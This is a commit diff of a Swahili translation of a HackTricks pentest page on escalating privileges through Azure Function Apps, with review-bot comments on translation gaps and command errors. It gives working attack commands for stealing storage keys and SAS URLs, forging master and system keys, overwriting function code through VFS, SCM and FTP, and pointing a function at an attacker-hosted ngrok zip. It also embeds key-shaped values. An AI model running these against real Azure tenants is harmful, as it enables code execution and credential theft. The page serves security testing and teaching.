mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-05 20:40:18 -08:00
Translated ['', 'src/pentesting-cloud/azure-security/az-privilege-escala
@@ -4,7 +4,7 @@
|
||||
|
||||
## Function Apps
|
||||
|
||||
Angalia ukurasa ufuatao kwa maelezo zaidi:
|
||||
Angalia ukurasa ufuatao kwa taarifa zaidi:
|
||||
|
||||
{{#ref}}
|
||||
../az-services/az-function-apps.md
|
||||
@@ -12,26 +12,24 @@ Angalia ukurasa ufuatao kwa maelezo zaidi:
|
||||
|
||||
### Bucket Read/Write
|
||||
|
||||
Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi, inawezekana kupata **kontena tofauti** (za kawaida au zenye majina yaliyowekwa awali) ambayo yanaweza kuwa na **msimbo unaotekelezwa na kazi**.
|
||||
Kwa ruhusa za kusoma containers ndani ya Storage Account inayohifadhi data za function, inawezekana kupata **different containers** (custom au zenye majina yaliyopangwa) ambazo zinaweza kuwa na **the code executed by the function**.
|
||||
|
||||
Mara tu unapopata mahali ambapo msimbo wa kazi umehifadhiwa, ikiwa una ruhusa za kuandika juu yake, unaweza kufanya kazi itekeleze msimbo wowote na kupandisha haki kwa utambulisho unaosimamiwa ulioambatanishwa na kazi hiyo.
|
||||
Mara unapopata wapi the code of the function iko, ikiwa una ruhusa za kuandika juu yake unaweza kufanya the function itekeleze any code na escalate privileges kwa managed identities attached to the function.
|
||||
|
||||
- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` na `WEBSITE_CONTENTSHARE`)
|
||||
- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)`
|
||||
|
||||
Msimbo wa kazi kwa kawaida huhifadhiwa ndani ya file share. Kwa ufikiaji wa kutosha, inawezekana kubadilisha faili ya msimbo na **kufanya kazi ipakue msimbo wowote** ikiruhusu kupandisha haki kwa utambulisho unaosimamiwa ulioambatanishwa na Kazi.
|
||||
|
||||
Njia hii ya kutekeleza kawaida huweka mipangilio **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** na **`WEBSITE_CONTENTSHARE`** ambazo unaweza kupata kutoka
|
||||
The code of the function is usually stored inside a file share. With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function.
|
||||
```bash
|
||||
az functionapp config appsettings list \
|
||||
--name <app-name> \
|
||||
--resource-group <res-group>
|
||||
```
|
||||
Mikakati hiyo itakuwa na **Storage Account Key** ambayo Function inaweza kutumia kufikia msimbo.
|
||||
Mafaili ya konfigurasheni yatakuwa na **Storage Account Key** ambayo Function inaweza kutumia kufikia msimbo.
|
||||
|
||||
> [!CAUTION]
|
||||
> Kwa ruhusa ya kutosha kuungana na File Share na **kubadilisha skripti** inayotumika, inawezekana kutekeleza msimbo wowote katika Function na kupandisha ruhusa.
|
||||
> Kwa ruhusa za kutosha kuungana na File Share na **modify the script** inayotekelezwa, inawezekana kutekeleza msimbo wowote ndani ya Function na kuongeza ruhusa.
|
||||
|
||||
Mfano ufuatao unatumia macOS kuungana na file share, lakini inapendekezwa pia kuangalia ukurasa ufuatao kwa maelezo zaidi kuhusu file shares:
|
||||
Mfano ufuatao unatumia macOS kuungana na file share, lakini inapendekezwa pia kukagua ukurasa ufuatao kwa habari zaidi kuhusu file shares:
|
||||
|
||||
{{#ref}}
|
||||
../az-services/az-file-shares.md
|
||||
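Review bot: the new side of this hunk leaves the file-share paragraph in English ("The code of the function is usually stored inside a file share...") while the rest of the translated text is Swahili, and the sentence that introduced the first `az functionapp config appsettings list` block ("Njia hii ya kutekeleza kawaida huweka mipangilio ... ambazo unaweza kupata kutoka") survives only on the old side, so the command block now has no lead-in; restore a Swahili lead-in before the fence. In the new `File Share` bullet the closing parenthesis has also moved inside the code span (`WEBSITE_CONTENTSHARE)`); close the backtick before the parenthesis as the old line did.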
@@ -47,26 +45,26 @@ open "smb://<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>"
|
||||
```
|
||||
- **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`)
|
||||
|
||||
Ni kawaida pia kupata **zip releases** ndani ya folda `function-releases` ya kontena la Akaunti ya Hifadhi ambayo programu ya kazi inatumia katika kontena **ambayo kwa kawaida inaitwa `function-releases`**.
|
||||
Ni kawaida pia kupata **zip releases** ndani ya folda `function-releases` ya container ya Storage Account ambayo function app inaitumia, ndani ya container **kwa kawaida inayoitwa `function-releases`**.
|
||||
|
||||
Kwa kawaida, njia hii ya kutekeleza itapanga config ya `WEBSITE_RUN_FROM_PACKAGE` katika:
|
||||
Kawaida, njia hii ya deployment itaweka config `WEBSITE_RUN_FROM_PACKAGE` katika:
|
||||
```bash
|
||||
az functionapp config appsettings list \
|
||||
--name <app-name> \
|
||||
--resource-group <res-group>
|
||||
```
|
||||
Hii config kawaida itakuwa na **SAS URL ya kupakua** msimbo kutoka kwa Akaunti ya Hifadhi.
|
||||
This config will usually contain a **SAS URL to download** the code from the Storage Account.
|
||||
|
||||
> [!CAUTION]
|
||||
> Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linashikilia msimbo katika zip** inawezekana kutekeleza msimbo wowote katika Kazi na kupandisha ruhusa.
|
||||
> Ikiwa kuna ruhusa za kutosha za kuunganishwa kwenye blob container ambayo **contains the code in zip**, inawezekana kutekeleza arbitrary code kwenye Function na escalate privileges.
|
||||
|
||||
- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)`
|
||||
- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE`)
|
||||
|
||||
Kama ilivyo katika kesi ya awali, ikiwa usambazaji unafanywa kupitia Github Actions inawezekana kupata folda **`github-actions-deploy`** katika Akaunti ya Hifadhi inayoshikilia zip ya msimbo na SAS URL kwa zip katika mipangilio `WEBSITE_RUN_FROM_PACKAGE`.
|
||||
Kama katika kesi iliyopita, ikiwa deployment imetokea kupitia Github Actions inawezekana kupata folda **`github-actions-deploy`** kwenye Storage Account inayojumuisha zip ya code na SAS URL kwa zip hiyo katika setting `WEBSITE_RUN_FROM_PACKAGE`.
|
||||
|
||||
- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` na `WEBSITE_CONTENTSHARE`)
|
||||
- **`scm-releases`**(`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`)
|
||||
|
||||
Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi inawezekana kupata kontena **`scm-releases`**. Ndani yake inawezekana kupata toleo la hivi karibuni katika **Squashfs filesystem file format** na hivyo inawezekana kusoma msimbo wa kazi:
|
||||
Kwa ruhusa za kusoma containers ndani ya Storage Account inayohifadhi function data inawezekana kupata container **`scm-releases`**. Ndani yake inawezekana kupata release ya mwisho katika **Squashfs filesystem file format** na kwa hivyo inawezekana kusoma code ya function:
|
||||
```bash
|
||||
# List containers inside the storage account of the function app
|
||||
az storage container list \
|
||||
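Review bot: the sentence after the second `az functionapp config appsettings list` block is left in English on the new side ("This config will usually contain a **SAS URL to download** the code from the Storage Account.") where the old side had it in Swahili; translate it like the surrounding text. The bracket fixes in the `github-actions-deploy` and `scm-releases` bullets (backtick and parenthesis order) are correct. Keep the wording that this setting holds a SAS URL, since that is exactly why read access to app settings is sensitive: the URL is itself a credential for the blob.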
@@ -98,10 +96,10 @@ unsquashfs -l "/tmp/scm-latest-<app-name>.zip"
|
||||
mkdir /tmp/fs
|
||||
unsquashfs -d /tmp/fs /tmp/scm-latest-<app-name>.zip
|
||||
```
|
||||
Ni pia inawezekana kupata **funguo za master na functions** zilizohifadhiwa katika akaunti ya hifadhi katika kontena **`azure-webjobs-secrets`** ndani ya folda **`<app-name>`** katika faili za JSON unazoweza kupata ndani.
|
||||
Pia inawezekana kupata **master and functions keys** zilizohifadhiwa kwenye storage account, kwenye container **`azure-webjobs-secrets`** ndani ya folda **`<app-name>`**, katika faili za JSON zilizomo ndani.
|
||||
|
||||
> [!CAUTION]
|
||||
> Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linabeba msimbo katika faili la nyongeza ya zip** (ambalo kwa kweli ni **`squashfs`**) inawezekana kutekeleza msimbo wowote katika Function na kupandisha ruhusa.
|
||||
> Kwa ruhusa za kutosha za kuunganishwa na blob container ambayo **ina code katika zip extension file** (ambayo kwa kweli ni **`squashfs`**), inawezekana kutekeleza code yoyote katika Function na kupandisha ruhusa.
|
||||
```bash
|
||||
# Modify code inside the script in /tmp/fs adding your code
|
||||
|
||||
@@ -118,11 +116,11 @@ az storage blob upload \
|
||||
```
|
||||
### `Microsoft.Web/sites/host/listkeys/action`
|
||||
|
||||
Ruhusa hii inaruhusu kuorodhesha funguo za kazi, mkuu na mfumo, lakini si funguo za mwenyeji, za kazi iliyotajwa na:
|
||||
Ruhusa hii inaruhusu kuorodhesha function, master na system keys, lakini sio host key ya function iliyobainishwa kwa:
|
||||
```bash
|
||||
az functionapp keys list --resource-group <res_group> --name <func-name>
|
||||
```
|
||||
Kwa funguo kuu pia inawezekana kupata msimbo wa chanzo katika URL kama:
|
||||
Kwa master key pia inawezekana kupata source code kupitia URL kama:
|
||||
```bash
|
||||
# Get "script_href" from
|
||||
az rest --method GET \
|
||||
@@ -130,49 +128,70 @@ az rest --method GET \
|
||||
|
||||
# Access
|
||||
curl "<script-href>?code=<master-key>"
|
||||
## Python example:
|
||||
# Python function app example
|
||||
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v
|
||||
# JavaScript function app example
|
||||
curl "https://consumptionexample.azurewebsites.net/admin/vfs/site/wwwroot/HttpExample/index.js?code=tKln7u4DtLgmG55XEvMjN0Lv9a3rKZK4dLbOHmWgD2v1AzFu3w9y_A==" -v
|
||||
```
|
||||
Na kubadilisha **kanuni inayotekelezwa** katika kazi na:
|
||||
Na kubadilisha **code inayotekelezwa** katika function kwa:
|
||||
```bash
|
||||
# Set the code to set in the function in /tmp/function_app.py
|
||||
## The following continues using the python example
|
||||
## Python function app example
|
||||
curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" \
|
||||
--data-binary @/tmp/function_app.py \
|
||||
-H "Content-Type: application/json" \
|
||||
-H "If-Match: *" \
|
||||
-v
|
||||
|
||||
# NodeJS function app example
|
||||
curl -X PUT "https://consumptionexample.azurewebsites.net/admin/vfs/site/wwwroot/HttpExample/index.js?code=tKln7u4DtLgmG55XEvMjN0Lv9a3rKZK4dLbOHmWgD2v1AzFu3w9y_A==" \
|
||||
--data-binary @/tmp/index.js \
|
||||
-H "Content-Type: application/json" \
|
||||
-H "If-Match: *" \
|
||||
-v
|
||||
```
|
||||
### `Microsoft.Web/sites/functions/listKeys/action`
|
||||
|
||||
Ruhusa hii inaruhusu kupata funguo za mwenyeji, za kazi iliyotajwa na:
|
||||
Ruhusa hii inaruhusu kupata ufunguo chaguo-msingi wa function iliyotajwa kwa:
|
||||
```bash
|
||||
az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"
|
||||
```
|
||||
Iite function ukitumia default key uliopata:
|
||||
```bash
|
||||
curl "https://<app-name>.azurewebsites.net/api/<func-endpoint-name>?code=<default-key>"
|
||||
```
|
||||
### `Microsoft.Web/sites/host/functionKeys/write`
|
||||
|
||||
Ruhusa hii inaruhusu kuunda/update funguo za kazi za kazi iliyoainishwa na:
|
||||
Ruhusa hii inaruhusu kuunda/kusasisha function key ya function iliyotajwa kwa:
|
||||
```bash
|
||||
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
|
||||
```
|
||||
### `Microsoft.Web/sites/host/masterKey/write`
|
||||
|
||||
Ruhusa hii inaruhusu kuunda/update funguo kuu kwa kazi iliyoainishwa na:
|
||||
Ruhusa hii inaruhusu kuunda/kusasisha master key kwa function iliyotajwa kwa:
|
||||
```bash
|
||||
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
|
||||
```
|
||||
> [!CAUTION]
|
||||
> Kumbuka kwamba kwa funguo hii unaweza pia kufikia msimbo wa chanzo na kuubadilisha kama ilivyoelezwa hapo awali!
|
||||
> Kumbuka kwamba kwa key hii pia unaweza kupata source code na kuibadilisha kama ilivyoelezwa hapo awali!
|
||||
|
||||
### `Microsoft.Web/sites/host/systemKeys/write`
|
||||
|
||||
Ruhusa hii inaruhusu kuunda/update funguo za mfumo kwa kazi iliyoainishwa na:
|
||||
Ruhusa hii inaruhusu kuunda/kusasisha system function key kwa function maalum kwa:
|
||||
```bash
|
||||
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
|
||||
```
|
||||
Tumia ufunguo:
|
||||
```bash
|
||||
# Ejemplo: Acceso a endpoints de Durable Functions
|
||||
curl "https://<app-name>.azurewebsites.net/runtime/webhooks/durabletask/instances?code=<system-key>"
|
||||
|
||||
# Ejemplo: Acceso a Event Grid webhooks
|
||||
curl "https://<app-name>.azurewebsites.net/runtime/webhooks/eventgrid?code=<system-key>"
|
||||
```
|
||||
### `Microsoft.Web/sites/config/list/action`
|
||||
|
||||
Ruhusa hii inaruhusu kupata mipangilio ya kazi. Ndani ya hizi mipangilio inaweza kuwa na uwezo wa kupata thamani za msingi **`AzureWebJobsStorage`** au **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** ambazo zina **funguo za akaunti za kufikia uhifadhi wa blob wa kazi kwa ruhusa KAMILI**.
|
||||
Ruhusa hii inaruhusu kupata mipangilio ya function. Ndani ya mipangilio hii inaweza kuwa inawezekana kupata thamani za chaguo-msingi **`AzureWebJobsStorage`** au **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`**, ambazo zina **funguo la akaunti ili kufikia blob storage ya function kwa ruhusa KAMILI**.
|
||||
```bash
|
||||
az functionapp config appsettings list --name <func-name> --resource-group <res-group>
|
||||
```
|
||||
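Review bot: the command under `Microsoft.Web/sites/host/systemKeys/write` is a copy of the masterKey one and still passes `--key-type masterKey`, so it does not exercise the permission the heading names; it should use the `systemKeys` key type (the `Tumia ufunguo:` examples that follow assume a system key). In all three `az functionapp keys set` commands `--name <func-key>` is misleading, since `--name` is the function app name (`<func-name>` elsewhere), and the same literal key value is repeated each time; use a `<key-value>` placeholder. The curl examples under `host/listkeys/action` embed concrete app hostnames (`newfuncttest123`, `consumptionexample`) and full `?code=` master keys, whereas the line above them uses `<script-href>?code=<master-key>`; replace them with placeholders so no key-shaped value ships in the doc. Smaller points: the two comments under `Tumia ufunguo:` are still in Spanish (`# Ejemplo: Acceso a ...`), and `<subsription-id>` in the `functions/listKeys/action` URI is misspelled.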
@@ -183,9 +202,9 @@ az rest --method POST \
|
||||
```
|
||||
### `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/write`
|
||||
|
||||
Hizi ruhusa zinaruhusu kuorodhesha thamani za config za kazi kama tulivyoona hapo awali pamoja na **kubadilisha hizi thamani**. Hii ni muhimu kwa sababu mipangilio hii inaonyesha mahali ambapo msimbo wa kutekeleza ndani ya kazi unapatikana.
|
||||
Ruhusa hizi zinawezesha kuorodhesha thamani za config za function kama tulivyoshuhudia hapo awali pamoja na **kubadilisha thamani hizi**. Hii ni muhimu kwa sababu mipangilio hii inaonyesha mahali ambapo code itakayotekelezwa ndani ya function imehifadhiwa.
|
||||
|
||||
Kwa hivyo inawezekana kuweka thamani ya mipangilio **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL zip faili inayoshikilia msimbo mpya wa kutekeleza ndani ya programu ya wavuti:
|
||||
Kwa hivyo inawezekana kuweka thamani ya setting **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL ya zip inayobeba code mpya ya kutekelezwa ndani ya web application:
|
||||
|
||||
- Anza kwa kupata config ya sasa
|
||||
```bash
|
||||
@@ -193,7 +212,7 @@ az functionapp config appsettings list \
|
||||
--name <app-name> \
|
||||
--resource-group <res-name>
|
||||
```
|
||||
- Unda msimbo unayotaka kazi ifanye na uweke hadharani
|
||||
- Tengeneza code unayotaka function ifanye kazi, kisha ui-host hadharani
|
||||
```bash
|
||||
# Write inside /tmp/web/function_app.py the code of the function
|
||||
cd /tmp/web/function_app.py
|
||||
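Review bot: `cd /tmp/web/function_app.py` (right before the `python3 -m http.server` shown as context of the next hunk) changes into a file path and will fail; it should be `cd /tmp/web` so the server serves the directory holding the function code. The preceding comment also only says to write `function_app.py`, but the later step expects a zip at the served URL (`function_app.zip`), so a `zip` step belongs here before the server is started.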
@@ -203,9 +222,9 @@ python3 -m http.server
|
||||
# Serve it using ngrok for example
|
||||
ngrok http 8000
|
||||
```
|
||||
- Badilisha kazi, shika vigezo vya awali na ongeza mwishoni config **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL yenye **zip** inayoshikilia msimbo.
|
||||
- Badilisha function, hifadhi vigezo vya awali na ongeza mwishoni config **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL yenye **zip** inayojumuisha code.
|
||||
|
||||
Mfano ufuatao ni wa **mipangilio yangu mwenyewe unahitaji kubadilisha thamani kwa zako**, kumbuka mwishoni thamani `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"`, hapa ndipo nilipokuwa nikihifadhi programu.
|
||||
Ifuatayo ni mfano wa mipangilio yangu mwenyewe **ambazo utahitaji kubadilisha thamani ili ziendane na zako**, kumbuka mwishoni thamani `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"`, hapa ndiyo nilikuwa niki-host programu.
|
||||
```bash
|
||||
# Modify the function
|
||||
az rest --method PUT \
|
||||
@@ -215,7 +234,7 @@ az rest --method PUT \
|
||||
```
|
||||
### `Microsoft.Web/sites/hostruntime/vfs/write`
|
||||
|
||||
Kwa ruhusa hii ni **uwezekano wa kubadilisha msimbo wa programu** kupitia konsoli ya wavuti (au kupitia kiunganishi hiki cha API):
|
||||
Kwa ruhusa hii inawezekana **kubadilisha msimbo wa programu** kupitia web console (au kupitia API endpoint ifuatayo):
|
||||
```bash
|
||||
# This is a python example, so we will be overwritting function_app.py
|
||||
# Store in /tmp/body the raw python code to put in the function
|
||||
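Review bot: typo in the comment `# This is a python example, so we will be overwritting function_app.py`: "overwriting".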
@@ -223,10 +242,29 @@ az rest --method PUT \
|
||||
--uri "https://management.azure.com/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \
|
||||
--headers '{"Content-Type": "application/json", "If-Match": "*"}' \
|
||||
--body @/tmp/body
|
||||
|
||||
# Through the SCM URL (using Azure permissions or SCM creds)
|
||||
az rest --method PUT \
|
||||
--url "https://consumptionexample.scm.azurewebsites.net/api/vfs/site/wwwroot/HttpExample/index.js" \
|
||||
--resource "https://management.azure.com/" \
|
||||
--headers "If-Match=*" \
|
||||
--body 'module.exports = async function (context, req) {
|
||||
context.log("JavaScript HTTP trigger function processed a request. Training Demo 2");
|
||||
|
||||
const name = (req.query.name || (req.body && req.body.name));
|
||||
const responseMessage = name
|
||||
? "Hello, " + name + ". This HTTP triggered function executed successfully. Training Demo 2"
|
||||
: "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response. Training Demo 2";
|
||||
|
||||
context.res = {
|
||||
// status: 200, /* Defaults to 200 */
|
||||
body: responseMessage
|
||||
};
|
||||
}'
|
||||
```
|
||||
### `Microsoft.Web/sites/publishxml/action`, (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`)
|
||||
|
||||
Ruhusa hizi zinaruhusu kuorodhesha wasifu wote wa uchapishaji ambao kimsingi unajumuisha **basic auth credentials**:
|
||||
Ruhusa hii inaruhusu kuorodhesha profaili zote za kuchapisha ambazo kimsingi zinajumuisha **basic auth credentials**:
|
||||
```bash
|
||||
# Get creds
|
||||
az functionapp deployment list-publishing-profiles \
|
||||
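Review bot: `<subcription-id>` in the `hostruntime/vfs/write` URI is misspelled (`<subscription-id>`, as the `vfs/read` section writes it). The SCM-URL variant hard-codes a concrete app (`consumptionexample.scm.azurewebsites.net`) and a full JavaScript body with "Training Demo 2" strings, while the first variant uses `<app-name>` and `--body @/tmp/body`; the same placeholder form would be cleaner and shorter. Also the new wording for the `publishxml/action` section changes "Ruhusa hizi" to "Ruhusa hii" although the heading still lists two permissions.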
@@ -234,15 +272,15 @@ az functionapp deployment list-publishing-profiles \
|
||||
--resource-group <res-name> \
|
||||
--output json
|
||||
```
|
||||
Njia nyingine ingekuwa kuweka akreditivu zako mwenyewe na kuzitumia kwa kutumia:
|
||||
Chaguo jingine ni kuweka creds zako mwenyewe na kuzitumia:
|
||||
```bash
|
||||
az functionapp deployment user set \
|
||||
--user-name DeployUser123456 g \
|
||||
--password 'P@ssw0rd123!'
|
||||
```
|
||||
- Ikiwa **REDACTED** akauti
|
||||
- Ikiwa **REDACTED** credentials
|
||||
|
||||
Ikiwa unaona kwamba akauti hizo ni **REDACTED**, ni kwa sababu unahitaji **kuwezesha chaguo la uthibitishaji wa msingi wa SCM** na kwa hiyo unahitaji ruhusa ya pili (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
|
||||
Ikiwa unaona kwamba credentials hizo ni **REDACTED**, ni kwa sababu unahitaji **kuwezesha chaguo la SCM la uthibitishaji wa msingi** na kwa hilo unahitaji ruhusa ya pili (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
|
||||
```bash
|
||||
# Enable basic authentication for SCM
|
||||
az rest --method PUT \
|
||||
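Review bot: `--user-name DeployUser123456 g \` contains a stray token `g`, which makes `az functionapp deployment user set` fail on an unrecognised argument; it should read `--user-name DeployUser123456 \`. In the REDACTED paragraph the backtick and parenthesis are still out of order on the new side (`(\`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):\``); the code span should close before the parenthesis and colon.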
@@ -262,9 +300,9 @@ az rest --method PUT \
|
||||
}
|
||||
}
|
||||
```
|
||||
- **Method SCM**
|
||||
- **Mbinu SCM**
|
||||
|
||||
Kisha, unaweza kufikia na hizi **basic auth credentials to the SCM URL** ya programu yako ya kazi na kupata thamani za mabadiliko ya env:
|
||||
Kisha, unaweza kufikia kwa kutumia hizi **basic auth credentials to the SCM URL** za function app yako na kupata thamani za env variables:
|
||||
```bash
|
||||
# Get settings values
|
||||
curl -u '<username>:<password>' \
|
||||
@@ -275,15 +313,15 @@ zip function_app.zip function_app.py # Your code in function_app.py
|
||||
curl -u '<username>:<password>' -X POST --data-binary "@<zip_file_path>" \
|
||||
https://<app-name>.scm.azurewebsites.net/api/zipdeploy
|
||||
```
|
||||
_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$<app-name>`._
|
||||
_Nakumbuka kwamba **SCM username** kawaida ni karakteri "$" ikifuatiwa na jina la app, kwa hivyo: `$<app-name>`._
|
||||
|
||||
Unaweza pia kufikia ukurasa wa wavuti kutoka `https://<app-name>.scm.azurewebsites.net/BasicAuth`
|
||||
|
||||
Thamani za mipangilio zinajumuisha **AccountKey** ya akaunti ya hifadhi inayohifadhi data ya programu ya kazi, ikiruhusu kudhibiti akaunti hiyo ya hifadhi.
|
||||
Thamani za settings zinajumuisha **AccountKey** ya storage account inayohifadhi data za function app, ikiruhusu kudhibiti storage account hiyo.
|
||||
|
||||
- **Method FTP**
|
||||
- **Mbinu FTP**
|
||||
|
||||
Unganisha na seva ya FTP ukitumia:
|
||||
Ungana na seva ya FTP ukitumia:
|
||||
```bash
|
||||
# macOS install lftp
|
||||
brew install lftp
|
||||
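Review bot: "Nakumbuka kwamba" in the translated SCM-username note means "I remember that", not "Note that"; the FTP note further down translates the same English sentence as "Kumbuka kwamba", so use that form here as well.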
@@ -297,19 +335,19 @@ ls # List
|
||||
get ./function_app.py -o /tmp/ # Download function_app.py in /tmp
|
||||
put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it
|
||||
```
|
||||
_Kumbuka kwamba **jina la mtumiaji wa FTP** kawaida liko katika muundo \<app-name>\\$\<app-name>._
|
||||
_Kumbuka kwamba **FTP username** kawaida huwa katika muundo \<app-name>\\$\<app-name>._
|
||||
|
||||
### `Microsoft.Web/sites/hostruntime/vfs/read`
|
||||
|
||||
Ruhusa hii inaruhusu **kusoma msimbo wa chanzo** wa programu kupitia VFS:
|
||||
Ruhusa hii inaruhusu **kusoma msimbo wa chanzo** wa app kupitia VFS:
|
||||
```bash
|
||||
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
|
||||
```
|
||||
### `Microsoft.Web/sites/functions/token/action`
|
||||
|
||||
Kwa ruhusa hii inawezekana [kupata **token ya admin**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) ambayo inaweza kutumika baadaye kupata **funguo kuu** na hivyo kufikia na kubadilisha msimbo wa kazi.
|
||||
Kwa ruhusa hii inawezekana [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) ambayo baadaye inaweza kutumika kupata **master key** na kwa hivyo kufikia na kubadilisha function's code.
|
||||
|
||||
Hata hivyo, katika ukaguzi wangu wa mwisho hakukuwa na token iliyorejeshwa, hivyo inaweza kuwa imezimwa au haitumiki tena, lakini hapa kuna jinsi unavyoweza kufanya hivyo:
|
||||
Hata hivyo, katika ukaguzi wangu wa mwisho hakuna token iliyorudishwa, hivyo inaweza kuwa imezimwa au haifanyi kazi tena, lakini hapa ni jinsi ungevifanya:
|
||||
```bash
|
||||
# Get admin token
|
||||
az rest --method GET \
|
||||
@@ -321,7 +359,7 @@ curl "https://<app-name>.azurewebsites.net/admin/host/systemkeys/_master" \
|
||||
```
|
||||
### `Microsoft.Web/sites/config/write`, (`Microsoft.Web/sites/functions/properties/read`)
|
||||
|
||||
Ruhusa hizi zinaruhusu **kuwezesha kazi** ambazo zinaweza kuwa zimezimwa (au kuzizima).
|
||||
Ruhusa hizi zinaruhusu **kuwezesha functions** ambazo zinaweza kuwa zimezimwa (au kuzizima).
|
||||
```bash
|
||||
# Enable a disabled function
|
||||
az functionapp config appsettings set \
|
||||
@@ -329,13 +367,13 @@ az functionapp config appsettings set \
|
||||
--resource-group <res-group> \
|
||||
--settings "AzureWebJobs.http_trigger1.Disabled=false"
|
||||
```
|
||||
Inawezekana pia kuona kama kazi imewezeshwa au kuzuiliwa katika URL ifuatayo (ukitumia ruhusa iliyo katika mabano):
|
||||
Inawezekana pia kuona ikiwa function imewezeshwa au imezimwa kwenye URL ifuatayo (ukitumia ruhusa ndani ya mabano):
|
||||
```bash
|
||||
az rest --url "https://management.azure.com/subscriptions/<subscripntion-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<func-name>/properties/state?api-version=2024-04-01"
|
||||
```
|
||||
### `Microsoft.Web/sites/config/write`, `Microsoft.Web/sites/config/list/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/read`)
|
||||
|
||||
Kwa ruhusa hizi inawezekana **kubadilisha kontena linalotumiwa na programu ya kazi** iliyowekwa kufanya kazi na kontena. Hii itamruhusu mshambuliaji kupakia programu ya kontena ya kazi ya azure yenye uharibifu kwenye docker hub (kwa mfano) na kufanya kazi hiyo iite.
|
||||
Kwa ruhusa hizi inawezekana **kubadilisha container inayotumika na function app** iliyosanifiwa kuendesha container. Hii itamruhusu attacker kupakia azure function container app yenye madhara kwenye docker hub (kwa mfano) na kufanya function iiitekeleze.
|
||||
```bash
|
||||
az functionapp config container set --name <app-name> \
|
||||
--resource-group <res-group> \
|
||||
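Review bot: the heading `Microsoft.Web/sites/config/write`, `Microsoft.Web/sites/config/list/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/read`) lists `config/list/action` twice, once as required and once in the parenthesised optional group; drop one. `<subscripntion-id>` in the `properties/state` URL is misspelled.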
@@ -343,29 +381,29 @@ az functionapp config container set --name <app-name> \
|
||||
```
|
||||
### `Microsoft.Web/sites/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/operationresults/read`)
|
||||
|
||||
Kwa ruhusa hizi inawezekana **kuunganisha utambulisho wa mtumiaji ulioendeshwa na kazi**. Ikiwa kazi hiyo ilikumbwa na hatari hii itaruhusu kupandisha mamlaka kwa utambulisho wowote wa mtumiaji ulioendeshwa.
|
||||
Kwa ruhusa hizi inawezekana **kuambatisha user managed identity mpya kwa function**. Ikiwa function imevamiwa, hii itaruhusu kupandisha ruhusa kwa user managed identity yoyote.
|
||||
